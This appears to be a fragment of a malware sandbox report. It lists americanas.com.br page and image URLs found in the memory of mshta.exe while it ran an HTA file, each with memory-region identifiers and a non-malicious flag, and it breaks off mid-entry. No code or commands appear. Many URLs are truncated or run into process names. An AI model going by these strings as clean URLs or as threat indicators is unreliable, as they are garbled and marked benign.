                                                                              https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depuradormshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                high
                                                                                https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador-gamer?chavemshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                  high
                                                                                  https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edommshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548511611.000000000514A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540362597.0000000005146000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                    high
                                                                                    https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfridaymshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                      high
                                                                                      https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png96648a2579.pmshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngdd69a1.pnmshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.americanas.com.br/categoria/tv-e-home-theater?chave=dk_hm_at_tvsmeta.largemeta.large.heimshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.americanas.com.br/categoria/tv-e-home-theater/tv/g/marca-LG/marca-Lg/marca-lg?viewMode=lmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541371134.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536957836.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535821688.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                              high
                                                                                              https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_UD-fe20595d366f.pngmshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535630387.0000000005308000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                high
                                                                                                https://www.americanas.com.br/categoria/automotivo?chave=dk_hm_at_automotivometa.largemeta.large.heimshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.pngmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                    high
                                                                                                    https://www.americanas.com.br/categoria/informatica?chave=pfm_home_informatica_menuhttps://www.amerimshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.americanas.com.br/categoria/gift8zzl0mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.americanas.com.br/categoria/belezamshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoesmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                            unknown
                                                                                                            https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-b2wadmshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548481944.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533534521.000000000413B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533514331.0000000004139000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533548535.0000000004142000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548567226.0000000005D2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.americanas.com.br/categoria/eletroportateis/maquina-de-costura?chave=pfm_hm_tt_1_0_maquimshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                high
                                                                                                                https://www.americanas.com.br/?utm_source=web_app_manifestmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                  high
                                                                                                                  https://www.americanas.com.br/categoria/beleza-e-perfumaria?chave=pfm_home_beleza_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                    high
                                                                                                                    https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535486328.000000000534B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.000000000534B000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                      high
                                                                                                                      https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                        high
                                                                                                                        https://www.americanas.com.br/especial/afiliados?chave=dk_hm_ft_00_02_afiliadosmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                          high
                                                                                                                          https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefoniamshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                            high
                                                                                                                            https://www.americanas.com.br/busca/ar-condicionado-split-9000-btusmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                              high
                                                                                                                              https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                high
                                                                                                                                https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-imagmshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535727062.000000000530E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 